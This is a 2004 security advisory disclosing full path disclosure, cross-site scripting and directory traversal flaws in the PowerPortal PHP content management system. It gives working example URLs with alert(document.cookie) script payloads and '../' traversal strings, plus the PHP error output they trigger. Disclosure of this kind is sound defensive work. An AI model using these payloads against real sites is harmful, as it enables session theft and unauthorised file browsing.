http://www.swp-zone.org/archivos/advisory-07.txt ------------------------------------------------------------------------------------------------- :.: Multiple vulnerabilities PowerPortal :.: PROGRAM: PowerPortal HOMEPAGE: http://powerportal.sourceforge.net/ VERSION: v1.x BUG: Multiple vulnerabilities DATE: 23/05/2004 AUTHOR: DarkBicho web: http://www.darkbicho.tk team: Security Wari Proyects <www.swp-zone.org> Email: darkbicho@xxxxxxxx ------------------------------------------------------------------------------------------------- 1.- Affected software description: ------------------------------ PowerPortal is a popular content management system, written in php 2.- Vulnerabilities: --------------- A. Full path disclosure: This vulnerability would allow a remote user to determine the full path to the web root directory and other potentially sensitive information. :.: Examples: * http://attacker/modules/gallery/resize.php <br /> <b>Warning</b>: imagecreatetruecolor(): Invalid image dimensions in <b>c:\appserv\www\power\modules\gallery\resize.php</b> on line <b>18</b><br /> <br /> <b>Warning</b>: imagecopyresized(): supplied argument is not a valid Image resource in <b>c:\appserv\www\power\modules\gallery\resize.php</b> on line <b>20</b><br /> <br /> <b>Warning</b>: imagejpeg(): supplied argument is not a valid Image resource in <b>c:\appserv\www\power\modules\gallery\resize.php</b> on line <b>23</b><br /> * http://attacker/power/modules.php?name=gallery&files=darkbicho Warning: opendir(c:\appserv\www\power\modules\gallery/../../modules/gallery/images/darkbicho): failed to open dir: Invalid argument in c:\appserv\www\power\modules\gallery\index.php on line 99 B. Cross-Site Scripting aka XSS: http://attacker/modules.php?name=private_messages&file=reply&id='><script>alert(document.cookie);</script> http://attacker/modules.php?name=links&search=<script>alert(document.cookie);</script>&func=search_results http://attacker/modules.php?name=content&file=search&search=<script>alert(document.cookie);</script>&func=results http://attacker/modules.php?name=gallery&files=<script>alert(document.cookie);</script> C. Arbitrary directory browsing: * http://attacker/modules.php?name=gallery&files=/../../../ 3.- SOLUTION: ¨¨¨¨¨¨¨¨ Vendors were contacted many weeks ago and plan to release a fixed version soon. Check the PowerPortal website for updates and official release details. 4.- Greetings: --------- greetings to my Peruvian group swp and perunderforce :D "EL PISCO ES Y SERA PERUANO" 5.- Contact ------- WEB: http://www.darkbicho.tk EMAIL: darkbicho@xxxxxxxx ------------------------------------------------------------------------------------------------- ___________ ____________ / _____/ \ / \______ \ \_____ \\ \/\/ /| ___/ / \\ / | | /_______ / \__/\ / |____| \/ \/ Security Wari Projects (c) 2002 - 2004 Made in Peru ----------------------------------------[ EOF ]---------------------------------------------- DarkBicho Web: http://www.darkbicho.tk "Mi unico delito es ver lo que otros no pueden ver" ---------------------- The End ----------------------
